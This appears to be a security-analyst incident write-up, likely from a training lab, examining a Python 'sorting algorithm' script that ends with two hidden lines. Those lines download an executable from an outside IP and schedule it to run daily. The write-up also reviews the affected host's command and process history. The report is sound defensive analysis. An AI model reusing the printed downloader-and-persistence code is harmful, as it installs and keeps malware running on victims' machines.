# Details
- Source Address : 172.16.17.36
- Source Hostname : Helena
- File Name : Sorted-Algorithm.py
- FIle Hash : 65d880c7f474720dafb84c1e93c51e11
- Device action : Allowed

# Analysis
- We are able to retrieve the suspected `.zip` file. We can perform first static analysis on it.
- Checking the hash for both the `zip` file and `.py` it is not flagged as malicious.
## Static Analysis
```python
import urllib.request
import os

print(r"""\

                                   ._ o o
                                   \_`-)|_
                                ,""       \ 
                              ,"  ## |   ಠ ಠ. 
                            ," ##   ,-\__    `.
                          ,"       /     `--._;)
                        ,"     ## /
                      ,"   ##    /


                """)
				
# vowels list
vowels = ['e', 'a', 'u', 'o', 'i']
# sort the vowels
vowels.sort()
# print vowels
print('Sorted list:', vowels)


# vowels list
vowels = ['e', 'a', 'u', 'o', 'i']
# sort the vowels
vowels.sort(reverse=True)
# print vowels
print('Sorted list (in Descending):', vowels)
	

# take second element for sort
def takeSecond(elem):
    return elem[1]
# random list
random = [(2, 2), (3, 4), (4, 1), (1, 3)]
# sort list with key
random.sort(key=takeSecond)
# print list
print('Sorted list:', random)	
					
					
					
urllib.request.urlretrieve("http://92.27.116.104/", "C:/Windows/Temp/x86_x64_setup.exe")
os.system('SCHTASKS /CREATE /SC DAILY /TN "DailyRoutine" /TR "C:/Windows/Temp/x86_x64_setup.exe" /ST 11:00')
```
- The python file looked normal until the last two lines.
```python
urllib.request.urlretrieve("http://92.27.116.104/", "C:/Windows/Temp/x86_x64_setup.exe")
os.system('SCHTASKS /CREATE /SC DAILY /TN "DailyRoutine" /TR "C:/Windows/Temp/x86_x64_setup.exe" /ST 11:00')
```
- We can look up for documentation for this library on [here](https://docs.python.org/3/library/urllib.request.html)
- The documention states for `urllib.request.urlretrieve` :
`Copy a network object denoted by a URL to a local file. If the URL points to a local file, the object will not be copied unless filename is supplied.`
- In this script, it is supplying a URL and a filename so it is actually creating a local file on the machine. And it being `setup.exe` doesn't make it look good either.
- IP in question :
`92.27.116.104`
**IP IS FLAGGED AS MALICIOUS**

- For the next line, SCHTASKS is a task scheduler for windows.
- We can view the [documentation on Microsoft](https://docs.microsoft.com/en-us/windows/win32/taskschd/schtasks)
-  So from the documentation, we can see that it's creating a task that runs daily and the task name is named  `DailyRoutine`, the task being ran is `C:/Windows/Temp/x86_x64_setup.exe`  and the start time of it is 11:00AM

# Logs
- If we look for the source address and destination address, the user connected to the malicious address on `May 14 2021 12:22PM`

# Endpoint
- Looking at Helena's proccess and CMD history, we verify that the malware has been run and we might have been compromised.

## CMD History
```
**06.04.2021 12:42:** whoami

**18.04.2021 09:13:** ipconfig

**18.04.2021 09:14:** dir

**19.04.2021 09:15:** hostname

**19.04.2021 09:16:** net user

**19.04.2021 09:17:** whoami

**19.04.2021 11:18:** tasklist

**14.05.2021 14:22:** python.exe C:/Users/Helena/Downloads/Sorted-Algorithm.py

**14.05.2021 14:23:** SCHTASKS /CREATE /SC DAILY /TN DailyRoutine /TR C:/Windows/Temp/x86_x64_setup.exe

**14.05.2021 17:13:** ipconfig

**14.05.2021 17:16:** ipconfig /all
```
## Process History
```txt
MD5:796b784e98008854c27f4b18d287ba30

Path:C:/Windows/System32/schtasks.exe

Command Line:SCHTASKS /CREATE /SC DAILY /TN DailyRoutine /TR C:/Windows/Temp/x86_x64_setup.exe
```

# Conclusion
- A python script disguised as a sorting algorithm contains code that  reaches out to a C2 server which hosts a executable. The executable then is downloaded and is set up as a schedule task to run daily at 11AM .

